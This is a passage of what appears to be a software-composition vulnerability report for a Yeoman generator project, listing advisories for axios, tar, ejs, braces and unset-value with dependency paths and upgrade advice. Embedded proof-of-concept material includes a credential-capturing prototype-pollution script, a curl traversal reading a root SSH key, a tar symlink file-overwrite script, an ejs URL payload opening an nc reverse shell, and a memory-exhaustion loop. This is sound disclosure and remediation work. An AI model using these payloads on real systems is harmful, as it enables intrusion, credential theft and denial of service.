  res.setHeader('Content-Type', 'application/json');
  res.end(JSON.stringify({ secret: 'response-secret' }));
});

await new Promise(resolve => server.listen(0, '127.0.0.1', resolve));

Object.prototype.transformResponse = function pollutedTransform(data, headers, status) {
  if (headers && typeof status === 'number') {
    seen.push({
      url: this.url,
      username: this.auth && this.auth.username,
      password: this.auth && this.auth.password,
      responseData: data
    });

    return { hijacked: true };
  }

  return true;
};

try {
  const { port } = server.address();

  const response = await axios.get(`http://127.0.0.1:${port}/users`, {
    auth: { username: 'svc-account', password: 'prod-secret-key-123' }
  });

  console.log(response.data); // { hijacked: true }
  console.log(seen[0]);       // request config plus original response body
} finally {
  delete Object.prototype.transformResponse;

  server.close();
}

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.31.1, 1.15.2 or higher.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.10 or higher.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target - like C:../../../target.txt.

PoC


const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.11 or higher.

References

high severity

Remote Code Execution (RCE)

  • Vulnerable module: ejs
  • Introduced through: yeoman-generator@2.0.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@4.11.0.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to generator-license@5.5.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to generator-node@2.7.0.
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 mem-fs-editor@4.0.3 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.

Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.

PoC:

Creation of reverse shell:

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s

Remediation

Upgrade ejs to version 3.1.7 or higher.

References

high severity
new

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the shouldBypassProxy function. An attacker can access internal or metadata endpoints by crafting request URLs in IPv4-mapped IPv6 notation, bypassing proxy exclusions. This can result in exposure of sensitive information, such as credentials, especially in cloud environments where instance metadata services are present.

Note: This is only exploitable if the attacker can control the request URL and the application is configured with NO_PROXY to exclude internal or metadata endpoints while using an HTTP/HTTPS proxy.

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

high severity

Excessive Platform Resource Consumption within a Loop

  • Vulnerable module: braces
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.

PoC

const { braces } = require('micromatch');

console.log("Executing payloads...");

const maxRepeats = 10;

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

Remediation

Upgrade braces to version 3.0.3 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: unset-value
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
